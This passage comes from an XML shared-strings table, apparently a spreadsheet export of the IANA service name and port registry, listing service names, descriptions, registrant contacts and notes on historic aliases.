    <t>[Technical_Pursuit_Inc]</t>
  </si>
  <si>
    <t>[Scott_Shattuck]</t>
  </si>
  <si>
    <t>This port has been retasked on 2015-06-16.</t>
  </si>
  <si>
    <t>This port has been removed on 2015-06-16.</t>
  </si>
  <si>
    <t>sophia-lm</t>
  </si>
  <si>
    <t>Sophia License Manager</t>
  </si>
  <si>
    <t>[Eric_Brown]</t>
  </si>
  <si>
    <t>here-lm</t>
  </si>
  <si>
    <t>Here License Manager</t>
  </si>
  <si>
    <t>[David_Ison]</t>
  </si>
  <si>
    <t>hiq</t>
  </si>
  <si>
    <t>HiQ License Manager</t>
  </si>
  <si>
    <t>[Rick_Pugh]</t>
  </si>
  <si>
    <t>af</t>
  </si>
  <si>
    <t>AudioFile</t>
  </si>
  <si>
    <t>[Jim_Gettys]</t>
  </si>
  <si>
    <t>innosys</t>
  </si>
  <si>
    <t>InnoSys</t>
  </si>
  <si>
    <t>innosys-acl</t>
  </si>
  <si>
    <t>Innosys-ACL</t>
  </si>
  <si>
    <t>[Eric_Welch]</t>
  </si>
  <si>
    <t>ibm-mqseries</t>
  </si>
  <si>
    <t>IBM MQSeries</t>
  </si>
  <si>
    <t>[Roger_Meli]</t>
  </si>
  <si>
    <t>dbstar</t>
  </si>
  <si>
    <t>DBStar</t>
  </si>
  <si>
    <t>[Jeffrey_Millman]</t>
  </si>
  <si>
    <t>novell-lu6-2</t>
  </si>
  <si>
    <t>Novell LU6.2
IANA assigned this well-formed service name as a replacement for "novell-lu6.2".</t>
  </si>
  <si>
    <t>[Peter_Liu]</t>
  </si>
  <si>
    <t>novell-lu6.2</t>
  </si>
  <si>
    <t>Novell LU6.2</t>
  </si>
  <si>
    <t>This entry is an alias to "novell-lu6-2".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>timbuktu-srv1</t>
  </si>
  <si>
    <t>Timbuktu Service 1 Port</t>
  </si>
  <si>
    <t>timbuktu-srv2</t>
  </si>
  <si>
    <t>Timbuktu Service 2 Port</t>
  </si>
  <si>
    <t>timbuktu-srv3</t>
  </si>
  <si>
    <t>Timbuktu Service 3 Port</t>
  </si>
  <si>
    <t>timbuktu-srv4</t>
  </si>
  <si>
    <t>Timbuktu Service 4 Port</t>
  </si>
  <si>
    <t>gandalf-lm</t>
  </si>
  <si>
    <t>Gandalf License Manager</t>
  </si>
  <si>
    <t>[gilmer]</t>
  </si>
  <si>
    <t>autodesk-lm</t>
  </si>
  <si>
    <t>Autodesk License Manager</t>
  </si>
  <si>
    <t>[David_Ko]</t>
  </si>
  <si>
    <t>essbase</t>
  </si>
  <si>
    <t>Essbase Arbor Software</t>
  </si>
  <si>
    <t>hybrid</t>
  </si>
  <si>
    <t>Hybrid Encryption Protocol</t>
  </si>
  <si>
    <t>[Howard_Hart]</t>
  </si>
  <si>
    <t>zion-lm</t>
  </si>
  <si>
    <t>Zion Software License Manager</t>
  </si>
  <si>
    <t>[David_Ferrero]</t>
  </si>
  <si>
    <t>sais</t>
  </si>
  <si>
    <t>Satellite-data Acquisition System 1</t>
  </si>
  <si>
    <t>[Bill_Taylor]</t>
  </si>
  <si>
    <t>mloadd</t>
  </si>
  <si>
    <t>mloadd monitoring tool</t>
  </si>
  <si>
    <t>[Bob_Braden_2]</t>
  </si>
  <si>
    <t>informatik-lm</t>
  </si>
  <si>
    <t>Informatik License Manager</t>
  </si>
  <si>
    <t>[Harald_Schlangmann]</t>
  </si>
  <si>
    <t>nms</t>
  </si>
  <si>
    <t>Hypercom NMS</t>
  </si>
  <si>
    <t>tpdu</t>
  </si>
  <si>
    <t>Hypercom TPDU</t>
  </si>
  <si>
    <t>[Noor_Chowdhury]</t>
  </si>
  <si>
    <t>rgtp</t>
  </si>
  <si>
    <t>Reverse Gossip Transport</t>
  </si>
  <si>
    <t>[Ian_Jackson]</t>
  </si>
  <si>
    <t>blueberry-lm</t>
  </si>
  <si>
    <t>Blueberry Software License Manager</t>
  </si>
  <si>
    <t>[Steve_Beigel]</t>
  </si>
  <si>
    <t>ms-sql-s</t>
  </si>
  <si>
    <t>Microsoft-SQL-Server</t>
  </si>
  <si>
    <t>ms-sql-m</t>
  </si>
  <si>
    <t>Microsoft-SQL-Monitor</t>
  </si>
  <si>
    <t>[Peter_Hussey]</t>
  </si>
  <si>
    <t>ibm-cics</t>
  </si>
  <si>
    <t>IBM CICS</t>
  </si>
  <si>
    <t>[Geoff_Meacock]</t>
  </si>
  <si>
    <t>saism</t>
  </si>
  <si>
    <t>Satellite-data Acquisition System 2</t>
  </si>
  <si>
    <t>tabula</t>
  </si>
  <si>
    <t>Tabula</t>
  </si>
  <si>
    <t>[Marcelo_Einhorn]</t>
  </si>
  <si>
    <t>eicon-server</t>
  </si>
  <si>
    <t>Eicon Security Agent/Server</t>
  </si>
  <si>
    <t>eicon-x25</t>
  </si>
  <si>
    <t>Eicon X25/SNA Gateway</t>
  </si>
  <si>
    <t>eicon-slp</t>
  </si>
  <si>
    <t>Eicon Service Location Protocol</t>
  </si>
  <si>
    <t>[Pat_Calhoun]</t>
  </si>
  <si>
    <t>cadis-1</t>
  </si>
  <si>
    <t>Cadis License Management</t>
  </si>
  <si>
    <t>cadis-2</t>
  </si>
  <si>
    <t>[Todd_Wichers]</t>
  </si>
  <si>
    <t>ies-lm</t>
  </si>
  <si>
    <t>Integrated Engineering Software</t>
  </si>
  <si>
    <t>[David_Tong]</t>
  </si>
  <si>
    <t>marcam-lm</t>
  </si>
  <si>
    <t>Marcam  License Management</t>
  </si>
  <si>
    <t>[Therese_Hunt]</t>
  </si>
  <si>
    <t>proxima-lm</t>
  </si>
  <si>
    <t>Proxima License Manager</t>
  </si>
  <si>
    <t>ora-lm</t>
  </si>
  <si>
    <t>Optical Research Associates License Manager</t>
  </si>
  <si>
    <t>apri-lm</t>
  </si>
  <si>
    <t>Applied Parallel Research LM</t>
  </si>
  <si>
    <t>[Jim_Dillon]</t>
  </si>
  <si>
    <t>oc-lm</t>
  </si>
  <si>
    <t>OpenConnect License Manager</t>
  </si>
  <si>
    <t>[Sue_Barnhill]</t>
  </si>
  <si>
    <t>peport</t>
  </si>
  <si>
    <t>PEport</t>
  </si>
  <si>
    <t>[Qentin_Neill]</t>
  </si>
  <si>
    <t>dwf</t>
  </si>
  <si>
    <t>Tandem Distributed Workbench Facility</t>
  </si>
  <si>
    <t>[Mike_Bert]</t>
  </si>
  <si>
    <t>infoman</t>
  </si>
  <si>
    <t>IBM Information Management</t>
  </si>
  <si>
    <t>[Karen_Burns]</t>
  </si>
  <si>
    <t>gtegsc-lm</t>
  </si>
  <si>
    <t>GTE Government Systems License Man</t>
  </si>
  <si>
    <t>[Mike_Gregory]</t>
  </si>
  <si>
    <t>genie-lm</t>
  </si>
  <si>
    <t>Genie License Manager</t>
  </si>
  <si>
    <t>[Paul_Applegate]</t>
  </si>
  <si>
    <t>interhdl-elmd</t>
  </si>
  <si>
    <t>interHDL License Manager
IANA assigned this well-formed service name as a replacement for "interhdl_elmd".</t>
  </si>
  <si>
    <t>[Eli_Sternheim]</t>
  </si>
  <si>
    <t>interhdl_elmd</t>
  </si>
  <si>
    <t>interHDL License Manager</t>
  </si>
  <si>
    <t>This entry is an alias to "interhdl-elmd".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>esl-lm</t>
  </si>
  <si>
    <t>ESL License Manager</t>
  </si>
  <si>
    <t>[Abel_Chou]</t>
  </si>
  <si>
    <t>dca</t>
  </si>
  <si>
    <t>DCA</t>
  </si>
  <si>
    <t>[Jeff_Garbers_2]</t>
  </si>
  <si>
    <t>valisys-lm</t>
  </si>
  <si>
    <t>Valisys License Manager</t>
  </si>
  <si>
    <t>[Leslie_Lincoln]</t>
  </si>
  <si>
    <t>nrcabq-lm</t>
  </si>
  <si>
    <t>Nichols Research Corp.</t>
  </si>
  <si>
    <t>[Howard_Cole]</t>
  </si>
  <si>
    <t>proshare1</t>
  </si>
  <si>
    <t>Proshare Notebook Application</t>
  </si>
  <si>
    <t>proshare2</t>
  </si>
  <si>
    <t>[Robin_Kar]</t>
  </si>
  <si>
    <t>ibm-wrless-lan</t>
  </si>
  <si>
    <t>IBM Wireless LAN
IANA assigned this well-formed service name as a replacement for "ibm_wrless_lan".</t>
  </si>
  <si>
    <t>[flanne]</t>
  </si>
  <si>
    <t>ibm_wrless_lan</t>
  </si>
  <si>
    <t>IBM Wireless LAN</t>
  </si>
  <si>
    <t>This entry is an alias to "ibm-wrless-lan".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>world-lm</t>
  </si>
  <si>
    <t>World License Manager</t>
  </si>
  <si>
    <t>[Michael_S_Amirault]</t>
  </si>
  <si>
    <t>nucleus</t>
  </si>
  <si>
    <t>Nucleus</t>
  </si>
  <si>
    <t>[Venky_Nagar]</t>
  </si>
  <si>
    <t>msl-lmd</t>
  </si>
  <si>
    <t>MSL License Manager
IANA assigned this well-formed service name as a replacement for "msl_lmd".</t>
  </si>
  <si>
    <t>[Matt_Timmermans]</t>
  </si>
  <si>
    <t>msl_lmd</t>
  </si>
  <si>
    <t>MSL License Manager</t>
  </si>
  <si>
    <t>This entry is an alias to "msl-lmd".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>pipes</t>
  </si>
  <si>
    <t>Pipes Platform</t>
  </si>
  <si>
    <t>[Mark_Farlin]</t>
  </si>
  <si>
    <t>oceansoft-lm</t>
  </si>
  <si>
    <t>Ocean Software License Manager</t>
  </si>
  <si>
    <t>[Randy_Leonard]</t>
  </si>
  <si>
    <t>csdmbase</t>
  </si>
  <si>
    <t>CSDMBASE</t>
  </si>
  <si>
    <t>csdm</t>
  </si>
  <si>
    <t>CSDM</t>
  </si>
  <si>
    <t>[Robert_Stabl]</t>
  </si>
  <si>
    <t>aal-lm</t>
  </si>
  <si>
    <t>Active Analysis Limited License Manager</t>
  </si>
  <si>
    <t>[David_Snocken]</t>
  </si>
  <si>
    <t>uaiact</t>
  </si>
  <si>
    <t>Universal Analytics</t>
  </si>
  <si>
    <t>[Mark_R_Ludwig]</t>
  </si>
  <si>
    <t>openmath</t>
  </si>
  <si>
    <t>OpenMath</t>
  </si>
  <si>
    <t>[Garth_Mayville]</t>
  </si>
  <si>
    <t>telefinder</t>
  </si>
  <si>
    <t>Telefinder</t>
  </si>
  <si>
    <t>[Jim_White]</t>
  </si>
  <si>
    <t>taligent-lm</t>
  </si>
  <si>
    <t>Taligent License Manager</t>
  </si>
  <si>
    <t>[Mark_Sapsford]</t>
  </si>
  <si>
    <t>clvm-cfg</t>
  </si>
  <si>
    <t>[Eric_Soderberg]</t>
  </si>
  <si>
    <t>ms-sna-server</t>
  </si>
  <si>
    <t>ms-sna-base</t>
  </si>
  <si>
    <t>dberegister</t>
  </si>
  <si>
    <t>[Brian_Griswold]</t>
  </si>
  <si>
    <t>pacerforum</t>
  </si>
  <si>
    <t>PacerForum</t>
  </si>
  <si>
    <t>[Peter_Caswell]</t>
  </si>
  <si>
    <t>airs</t>
  </si>
  <si>
    <t>AIRS</t>
  </si>
  <si>
    <t>[Bruce_Wilson]</t>
  </si>
  <si>
    <t>miteksys-lm</t>
  </si>
  <si>
    <t>Miteksys License Manager</t>
  </si>
  <si>
    <t>[Shane_McRoberts]</t>
  </si>
  <si>
    <t>afs</t>
  </si>
  <si>
    <t>AFS License Manager</t>
  </si>
  <si>
    <t>[Michael_R_Pizolato]</t>
  </si>
  <si>
    <t>confluent</t>
  </si>
  <si>
    <t>Confluent License Manager</t>
  </si>
  <si>
    <t>[James_Greenfiel]</t>
  </si>
  <si>
    <t>lansource</t>
  </si>
  <si>
    <t>LANSource</t>
  </si>
  <si>
    <t>[Christopher_Wells]</t>
  </si>
  <si>
    <t>nms-topo-serv</t>
  </si>
  <si>
    <t>nms_topo_serv
IANA assigned this well-formed service name as a replacement for "nms_topo_serv".</t>
  </si>
  <si>
    <t>[Sylvia_Siu]</t>
  </si>
  <si>
    <t>nms_topo_serv</t>
  </si>
  <si>
    <t>This entry is an alias to "nms-topo-serv".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>localinfosrvr</t>
  </si>
  <si>
    <t>LocalInfoSrvr</t>
  </si>
  <si>
    <t>[Brian_Matthews_2]</t>
  </si>
  <si>
    <t>docstor</t>
  </si>
  <si>
    <t>DocStor</t>
  </si>
  <si>
    <t>[Brian_Spears]</t>
  </si>
  <si>
    <t>dmdocbroker</t>
  </si>
  <si>
    <t>[Razmik_Abnous]</t>
  </si>
  <si>
    <t>insitu-conf</t>
  </si>
  <si>
    <t>[Paul_Blacknell]</t>
  </si>
  <si>
    <t>Unauthorized Use Known on port 1491</t>
  </si>
  <si>
    <t>stone-design-1</t>
  </si>
  <si>
    <t>[Andrew_Stone]</t>
  </si>
  <si>
    <t>netmap-lm</t>
  </si>
  <si>
    <t>netmap_lm
IANA assigned this well-formed service name as a replacement for "netmap_lm".</t>
  </si>
  <si>
    <t>[Phillip_Magson]</t>
  </si>
  <si>
    <t>netmap_lm</t>
  </si>
  <si>
    <t>This entry is an alias to "netmap-lm".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>ica</t>
  </si>
  <si>
    <t>[John_Richardson]</t>
  </si>
  <si>
    <t>cvc</t>
  </si>
  <si>
    <t>liberty-lm</t>
  </si>
  <si>
    <t>[Jim_Rogers]</t>
  </si>
  <si>
    <t>rfx-lm</t>
  </si>
  <si>
    <t>[Bill_Bishop]</t>
  </si>
  <si>
    <t>sybase-sqlany</t>
  </si>
  <si>
    <t>Sybase SQL Any</t>
  </si>
  <si>
    <t>[Dave_Neudoerffer]</t>
  </si>
  <si>
    <t>fhc</t>
  </si>
  <si>
    <t>Federico Heinz Consultora</t>
  </si>
  <si>
    <t>[Federico_Heinz]</t>
  </si>
  <si>
    <t>vlsi-lm</t>
  </si>
  <si>
    <t>VLSI License Manager</t>
  </si>
  <si>
    <t>[Shue_Lin_Kuo]</t>
  </si>
  <si>
    <t>saiscm</t>
  </si>
  <si>
    <t>Satellite-data Acquisition System 3</t>
  </si>
  <si>
    <t>shivadiscovery</t>
  </si>
  <si>
    <t>Shiva</t>
  </si>
  <si>
    <t>[Jonathan_Wenocur]</t>
  </si>
  <si>
    <t>imtc-mcs</t>
  </si>
  <si>
    <t>Databeam</t>
  </si>
  <si>
    <t>[Jim_Johnston]</t>
  </si>
  <si>
    <t>evb-elm</t>
  </si>
  <si>
    <t>EVB Software Engineering License Manager</t>
  </si>
  <si>
    <t>[B_G_Mahesh]</t>
  </si>
  <si>
    <t>funkproxy</t>
  </si>
  <si>
    <t>Funk Software, Inc.</t>
  </si>
  <si>
    <t>[Robert_D_Vincent]</t>
  </si>
  <si>
    <t>utcd</t>
  </si>
  <si>
    <t>Universal Time daemon (utcd)</t>
  </si>
  <si>
    <t>symplex</t>
  </si>
  <si>
    <t>[Mike_Turley]</t>
  </si>
  <si>
    <t>diagmond</t>
  </si>
  <si>
    <t>[Pete_Moscatelli]</t>
  </si>
  <si>
    <t>robcad-lm</t>
  </si>
  <si>
    <t>Robcad, Ltd. License Manager</t>
  </si>
  <si>
    <t>[Hindin_Joseph]</t>
  </si>
  <si>
    <t>mvx-lm</t>
  </si>
  <si>
    <t>Midland Valley Exploration Ltd. Lic. Man.</t>
  </si>
  <si>
    <t>[Neil_Salter]</t>
  </si>
  <si>
    <t>3l-l1</t>
  </si>
  <si>
    <t>[Ian_A_Young]</t>
  </si>
  <si>
    <t>wins</t>
  </si>
  <si>
    <t>Microsoft's Windows Internet Name Service</t>
  </si>
  <si>
    <t>fujitsu-dtc</t>
  </si>
  <si>
    <t>Fujitsu Systems Business of America, Inc</t>
  </si>
  <si>
    <t>fujitsu-dtcns</t>
  </si>
  <si>
    <t>[Charles_A_Higgins]</t>
  </si>
  <si>
    <t>ifor-protocol</t>
  </si>
  <si>
    <t>[Dr_R_P_Alston]</t>
  </si>
  <si>
    <t>vpad</t>
  </si>
  <si>
    <t>Virtual Places Audio data</t>
  </si>
  <si>
    <t>vpac</t>
  </si>
  <si>
    <t>Virtual Places Audio control</t>
  </si>
  <si>
    <t>vpvd</t>
  </si>
  <si>
    <t>Virtual Places Video data</t>
  </si>
  <si>
    <t>vpvc</t>
  </si>
  <si>
    <t>Virtual Places Video control</t>
  </si>
  <si>
    <t>atm-zip-office</t>
  </si>
  <si>
    <t>atm zip office</t>
  </si>
  <si>
    <t>[Wilson_Kwan]</t>
  </si>
  <si>
    <t>ncube-lm</t>
  </si>
  <si>
    <t>nCube License Manager</t>
  </si>
  <si>
    <t>[Maxine_Yuen]</t>
  </si>
  <si>
    <t>ricardo-lm</t>
  </si>
  <si>
    <t>Ricardo North America License Manager</t>
  </si>
  <si>
    <t>[Mike_Flemming]</t>
  </si>
  <si>
    <t>cichild-lm</t>
  </si>
  <si>
    <t>cichild</t>
  </si>
  <si>
    <t>ingreslock</t>
  </si>
  <si>
    <t>ingres</t>
  </si>
  <si>
    <t>orasrv</t>
  </si>
  <si>
    <t>oracle</t>
  </si>
  <si>
    <t>prospero-np</t>
  </si>
  <si>
    <t>Prospero Directory Service non-priv</t>
  </si>
  <si>
    <t>pdap-np</t>
  </si>
  <si>
    <t>Prospero Data Access Prot non-priv</t>
  </si>
  <si>
    <t>tlisrv</t>
  </si>
  <si>
    <t>ngr-t</t>
  </si>
  <si>
    <t>NGR transport protocol for mobile ad-hoc networks</t>
  </si>
  <si>
    <t>[nyantec]</t>
  </si>
  <si>
    <t>[Mikael_Voss]</t>
  </si>
  <si>
    <t>coauthor</t>
  </si>
  <si>
    <t>rap-service</t>
  </si>
  <si>
    <t>rap-listen</t>
  </si>
  <si>
    <t>[Phil_Servita]</t>
  </si>
  <si>
    <t>miroconnect</t>
  </si>
  <si>
    <t>[Michael_Fischer_2]</t>
  </si>
  <si>
    <t>virtual-places</t>
  </si>
  <si>
    <t>Virtual Places Software</t>
  </si>
  <si>
    <t>micromuse-lm</t>
  </si>
  <si>
    <t>[Adam_Kerrison]</t>
  </si>
  <si>
    <t>ampr-info</t>
  </si>
  <si>
    <t>ampr-inter</t>
  </si>
  <si>
    <t>sdsc-lm</t>
  </si>
  <si>
    <t>isi-lm</t>
  </si>
  <si>
    <t>[Len_Wanger]</t>
  </si>
  <si>
    <t>3ds-lm</t>
  </si>
  <si>
    <t>[Keith_Trummel]</t>
  </si>
  <si>
    <t>intellistor-lm</t>
  </si>
  <si>
    <t>Intellistor License Manager</t>
  </si>
  <si>
    <t>[Ron_Vaughn]</t>
  </si>
  <si>
    <t>rds</t>
  </si>
  <si>
    <t>rds2</t>
  </si>
  <si>
    <t>[Sudhakar_Rajamannar]</t>
  </si>
  <si>
    <t>gridgen-elmd</t>
  </si>
  <si>
    <t>[John_R_Chawner]</t>
  </si>
  <si>
    <t>simba-cs</t>
  </si>
  <si>
    <t>[Betsy_Alexander]</t>
  </si>
  <si>
    <t>aspeclmd</t>
  </si>
  <si>
    <t>[V_Balaji]</t>
  </si>
  <si>
    <t>vistium-share</t>
  </si>
  <si>
    <t>[Allison_Carleton]</t>
  </si>
  <si>
    <t>abbaccuray</t>
  </si>
  <si>
    <t>[John_Wendt]</t>
  </si>
  <si>
    <t>laplink</t>
  </si>
  <si>
    <t>[Michael_Crawford]</t>
  </si>
  <si>
    <t>axon-lm</t>
  </si>
  <si>
    <t>Axon License Manager</t>
  </si>
  <si>
    <t>[Mark_Pearce]</t>
  </si>
  <si>
    <t>shivahose</t>
  </si>
  <si>
    <t>Shiva Hose</t>
  </si>
  <si>
    <t>shivasound</t>
  </si>
  <si>
    <t>Shiva Sound</t>
  </si>
  <si>
    <t>[Kin_Chan]</t>
  </si>
  <si>
    <t>3m-image-lm</t>
  </si>
  <si>
    <t>Image Storage license manager 3M Company</t>
  </si>
  <si>
    <t>[J_C_Canessa]</t>
  </si>
  <si>
    <t>hecmtl-db</t>
  </si>
  <si>
    <t>HECMTL-DB</t>
  </si>
  <si>
    <t>[Maxime_Belanger]</t>
  </si>
  <si>
    <t>pciarray</t>
  </si>
  <si>
    <t>[Ron_Folk]</t>
  </si>
  <si>
    <t>sna-cs</t>
  </si>
  <si>
    <t>[Tony_Sowter]</t>
  </si>
  <si>
    <t>caci-lm</t>
  </si>
  <si>
    <t>CACI Products Company License Manager</t>
  </si>
  <si>
    <t>[Erik_Blume]</t>
  </si>
  <si>
    <t>livelan</t>
  </si>
  <si>
    <t>[Kaynam_Hedayat]</t>
  </si>
  <si>
    <t>veritas-pbx</t>
  </si>
  <si>
    <t>VERITAS Private Branch Exchange
IANA assigned this well-formed service name as a replacement for "veritas_pbx".</t>
  </si>
  <si>
    <t>[Stefan_Winkel]</t>
  </si>
  <si>
    <t>2004-04</t>
  </si>
  <si>
    <t>veritas_pbx</t>
  </si>
  <si>
    <t>VERITAS Private Branch Exchange</t>
  </si>
  <si>
    <t>This entry is an alias to "veritas-pbx".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>arbortext-lm</t>
  </si>
  <si>
    <t>ArborText License Manager</t>
  </si>
  <si>
    <t>[David_J_Wilson]</t>
  </si>
  <si>
    <t>xingmpeg</t>
  </si>
  <si>
    <t>[Howard_Gordon]</t>
  </si>
  <si>
    <t>web2host</t>
  </si>
  <si>
    <t>[Stephen_Johnson]</t>
  </si>
  <si>
    <t>asci-val</t>
  </si>
  <si>
    <t>ASCI-RemoteSHADOW</t>
  </si>
  <si>
    <t>facilityview</t>
  </si>
  <si>
    <t>[Ed_Green]</t>
  </si>
  <si>
    <t>pconnectmgr</t>
  </si>
  <si>
    <t>[Bob_Kaiser]</t>
  </si>
  <si>
    <t>cadabra-lm</t>
  </si>
  <si>
    <t>Cadabra License Manager</t>
  </si>
  <si>
    <t>[Arthur_Castonguay]</t>
  </si>
  <si>
    <t>pay-per-view</t>
  </si>
  <si>
    <t>Pay-Per-View</t>
  </si>
  <si>
    <t>[Brian_Tung]</t>
  </si>
  <si>
    <t>winddlb</t>
  </si>
  <si>
    <t>WinDD</t>
  </si>
  <si>
    <t>[Kelly_Sims]</t>
  </si>
  <si>
    <t>corelvideo</t>
  </si>
  <si>
    <t>CORELVIDEO</t>
  </si>
  <si>
    <t>[Ming_Poon]</t>
  </si>
  <si>
    <t>jlicelmd</t>
  </si>
  <si>
    <t>[Christian_Schormann]</t>
  </si>
  <si>
    <t>tsspmap</t>
  </si>
  <si>
    <t>[Paul_W_Nelson]</t>
  </si>
  <si>
    <t>ets</t>
  </si>
  <si>
    <t>[Carstein_Seeberg]</t>
  </si>
  <si>
    <t>orbixd</t>
  </si>
  <si>
    <t>[Bridget_Walsh]</t>
  </si>
  <si>
    <t>rdb-dbs-disp</t>
  </si>
  <si>
    <t>Oracle Remote Data Base</t>
  </si>
  <si>
    <t>[mackin]</t>
  </si>
  <si>
    <t>chip-lm</t>
  </si>
  <si>
    <t>Chipcom License Manager</t>
  </si>
  <si>
    <t>itscomm-ns</t>
  </si>
  <si>
    <t>[Rich_Thompson]</t>
  </si>
  <si>
    <t>mvel-lm</t>
  </si>
  <si>
    <t>[David_Bisset]</t>
  </si>
  <si>
    <t>oraclenames</t>
  </si>
  <si>
    <t>[P_V_Shivkumar]</t>
  </si>
  <si>
    <t>moldflow-lm</t>
  </si>
  <si>
    <t>Moldflow License Manager</t>
  </si>
  <si>
    <t>[Lech_Laskowski]</t>
  </si>
  <si>
    <t>hypercube-lm</t>
  </si>
  <si>
    <t>[Christopher_McLendon]</t>
  </si>
  <si>
    <t>jacobus-lm</t>
  </si>
  <si>
    <t>Jacobus License Manager</t>
  </si>
  <si>
    <t>[Tony_Cleveland]</t>
  </si>
  <si>
    <t>ioc-sea-lm</t>
  </si>
  <si>
    <t>[Paul_Nelson]</t>
  </si>
  <si>
    <t>tn-tl-r1</t>
  </si>
  <si>
    <t>tn-tl-r2</t>
  </si>
  <si>
    <t>mil-2045-47001</t>
  </si>
  <si>
    <t>MIL-2045-47001</t>
  </si>
  <si>
    <t>[Eric_Whitehill]</t>
  </si>
  <si>
    <t>msims</t>
  </si>
  <si>
    <t>MSIMS</t>
  </si>
  <si>
    <t>[Glenn_Olander]</t>
  </si>
  <si>
    <t>simbaexpress</t>
  </si>
  <si>
    <t>tn-tl-fd2</t>
  </si>
  <si>
    <t>intv</t>
  </si>
  <si>
    <t>[Dermot_Tynand]</t>
  </si>
  <si>
    <t>ibm-abtact</t>
  </si>
  <si>
    <t>[Sandeep_K_Singhal]</t>
  </si>
  <si>
    <t>pra-elmd</t>
  </si>
  <si>
    <t>pra_elmd
IANA assigned this well-formed service name as a replacement for "pra_elmd".</t>
  </si>
  <si>
    <t>[Dennis_Mastin]</t>
  </si>
  <si>
    <t>pra_elmd</t>
  </si>
  <si>
    <t>This entry is an alias to "pra-elmd".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>triquest-lm</t>
  </si>
  <si>
    <t>[Nand_Kumar]</t>
  </si>
  <si>
    <t>vqp</t>
  </si>
  <si>
    <t>VQP</t>
  </si>
  <si>
    <t>[Keith_McCloghrie]</t>
  </si>
  <si>
    <t>gemini-lm</t>
  </si>
  <si>
    <t>[Tony_Sawyer]</t>
  </si>
  <si>
    <t>ncpm-pm</t>
  </si>
  <si>
    <t>[Ted_Power]</t>
  </si>
  <si>
    <t>commonspace</t>
  </si>
  <si>
    <t>[Rob_Chandhok_2]</t>
  </si>
  <si>
    <t>mainsoft-lm</t>
  </si>
  <si>
    <t>[Anand_Gangadharan]</t>
  </si>
  <si>
    <t>sixtrak</t>
  </si>
  <si>
    <t>[Red_Lion_Controls]</t>
  </si>
  <si>
    <t>[Denis_Aull]</t>
  </si>
  <si>
    <t>radio</t>
  </si>
  <si>
    <t>radio-sm</t>
  </si>
  <si>
    <t>radio-bc</t>
  </si>
  <si>
    <t>[Ken_Chapman]</t>
  </si>
  <si>
    <t>orbplus-iiop</t>
  </si>
  <si>
    <t>[Robert_A_Kukura]</t>
  </si>
  <si>
    <t>picknfs</t>
  </si>
  <si>
    <t>[John_Lombardo]</t>
  </si>
  <si>
    <t>simbaservices</t>
  </si>
  <si>
    <t>issd</t>
  </si>
  <si>
    <t>aas</t>
  </si>
  <si>
    <t>[Bob_Beard]</t>
  </si>
  <si>
    <t>inspect</t>
  </si>
  <si>
    <t>[Frank_O_Neill]</t>
  </si>
  <si>
    <t>picodbc</t>
  </si>
  <si>
    <t>pickodbc</t>
  </si>
  <si>
    <t>icabrowser</t>
  </si>
  <si>
    <t>[Brad_Pedersen]</t>
  </si>
  <si>
    <t>slp</t>
  </si>
  <si>
    <t>Salutation Manager (Salutation Protocol)</t>
  </si>
  <si>
    <t>slm-api</t>
  </si>
  <si>
    <t>Salutation Manager (SLM-API)</t>
  </si>
  <si>
    <t>[Tohru_Mori]</t>
  </si>
  <si>
    <t>stt</t>
  </si>
  <si>
    <t>[Ryan_Bolz]</t>
  </si>
  <si>
    <t>smart-lm</t>
  </si>
  <si>
    <t>Smart Corp. License Manager</t>
  </si>
  <si>
    <t>[Connie_Qiu]</t>
  </si>
  <si>
    <t>isysg-lm</t>
  </si>
  <si>
    <t>[Adam_Curtin]</t>
  </si>
  <si>
    <t>taurus-wh</t>
  </si>
  <si>
    <t>[Jeff_Moffatt]</t>
  </si>
  <si>
    <t>ill</t>
  </si>
  <si>
    <t>Inter Library Loan</t>
  </si>
  <si>
    <t>[Niall_Murphy]</t>
  </si>
  <si>
    <t>netbill-trans</t>
  </si>
  <si>
    <t>NetBill Transaction Server</t>
  </si>
  <si>
    <t>netbill-keyrep</t>
  </si>
  <si>
    <t>NetBill Key Repository</t>
  </si>
  <si>
    <t>netbill-cred</t>
  </si>
  <si>
    <t>NetBill Credential Server</t>
  </si>
  <si>
    <t>netbill-auth</t>
  </si>
  <si>
    <t>NetBill Authorization Server</t>
  </si>
  <si>
    <t>netbill-prod</t>
  </si>
  <si>
    <t>NetBill Product Server</t>
  </si>
  <si>
    <t>[Marvin_Sirbu]</t>
  </si>
  <si>
    <t>nimrod-agent</t>
  </si>
  <si>
    <t>Nimrod Inter-Agent Communication</t>
  </si>
  <si>
    <t>[Charles_Lynn]</t>
  </si>
  <si>
    <t>skytelnet</t>
  </si>
  <si>
    <t>[Byron_Jones]</t>
  </si>
  <si>
    <t>xs-openstorage</t>
  </si>
  <si>
    <t>[XuiS_Software_Ltd]</t>
  </si>
  <si>
    <t>faxportwinport</t>
  </si>
  <si>
    <t>[Chris_Wells]</t>
  </si>
  <si>
    <t>softdataphone</t>
  </si>
  <si>
    <t>[Dror_Gill]</t>
  </si>
  <si>
    <t>ontime</t>
  </si>
  <si>
    <t>[Keith_Rhodes]</t>
  </si>
  <si>
    <t>jaleosnd</t>
  </si>
  <si>
    <t>udp-sr-port</t>
  </si>
  <si>
    <t>[Herb_Jensen]</t>
  </si>
  <si>
    <t>svs-omagent</t>
  </si>
  <si>
    <t>[Alberto_Berlen]</t>
  </si>
  <si>
    <t>shockwave</t>
  </si>
  <si>
    <t>Shockwave</t>
  </si>
  <si>
    <t>[Sarah_Allen]</t>
  </si>
  <si>
    <t>t128-gateway</t>
  </si>
  <si>
    <t>T.128 Gateway</t>
  </si>
  <si>
    <t>[Phil_May]</t>
  </si>
  <si>
    <t>lontalk-norm</t>
  </si>
  <si>
    <t>LonTalk normal</t>
  </si>
  <si>
    <t>lontalk-urgnt</t>
  </si>
  <si>
    <t>LonTalk urgent</t>
  </si>
  <si>
    <t>[Bob_Dolin]</t>
  </si>
  <si>
    <t>oraclenet8cman</t>
  </si>
  <si>
    <t>Oracle Net8 Cman</t>
  </si>
  <si>
